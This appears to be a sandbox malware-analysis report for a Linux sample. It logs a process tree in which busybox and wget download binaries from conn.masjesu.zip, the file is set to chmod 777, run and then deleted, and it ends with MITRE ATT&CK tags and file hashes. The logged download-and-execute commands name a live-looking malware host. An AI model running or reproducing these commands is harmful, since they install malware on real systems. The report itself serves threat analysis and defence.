PID:957
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- System Network Configuration Discovery
PID:959
-
-
/bin/chmodchmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:962
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- System Network Configuration Discovery
PID:963
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
176B
MD5e1732e70f015e99d14dff1eeeaec9966
SHA1c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA2566de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA5126ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7
-
Filesize
114B
MD5546071c6a6aeff34580b4d1a9b35a7c3
SHA1dc2de298837a86d3bc86e8a328411229d9eccdb6
SHA2562d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12
SHA512207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97